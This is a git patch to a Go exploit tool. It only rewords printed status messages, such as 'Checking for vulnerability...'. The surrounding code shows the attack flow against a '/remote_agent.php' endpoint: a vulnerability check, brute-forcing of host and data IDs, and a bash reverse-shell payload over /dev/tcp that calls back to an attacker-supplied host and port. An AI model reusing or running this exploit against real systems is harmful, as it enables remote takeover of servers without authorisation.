From d24b8acd21aeb75f24bb7a1d711b5020f1a8efb6 Mon Sep 17 00:00:00 2001 From: Vomitblood Date: Fri, 24 Jan 2025 11:33:53 +0800 Subject: [PATCH] fixed text outputs --- internal/exploiter/exploiter.go | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/internal/exploiter/exploiter.go b/internal/exploiter/exploiter.go index df50a89..e101a2b 100644 --- a/internal/exploiter/exploiter.go +++ b/internal/exploiter/exploiter.go @@ -111,9 +111,9 @@ func reverseShell(payload string, vulnUrl string, hostID int, dataIDs int) { func Exploit(urlTarget string, lhost string, lport string) { vulnURL := urlTarget + "/remote_agent.php" - fmt.Println("Checking...") + fmt.Println("Checking for vulnerability...") if checkVuln(vulnURL) { - fmt.Println("The target is vulnerable. Exploiting...") + fmt.Println("The target is vulnerable. Bruteforcing...") fmt.Println("Bruteforcing the host_id and local_data_ids") isVuln, hostID, dataIDs := bruteForcing(vulnURL) @@ -122,7 +122,7 @@ func Exploit(urlTarget string, lhost string, lport string) { payload := fmt.Sprintf("bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'", lhost, lport) reverseShell(payload, vulnURL, hostID, dataIDs) } else { - fmt.Println("The Bruteforce Failed...") + fmt.Println("The bruteforce failed...") } } else { fmt.Println("The target is not vulnerable")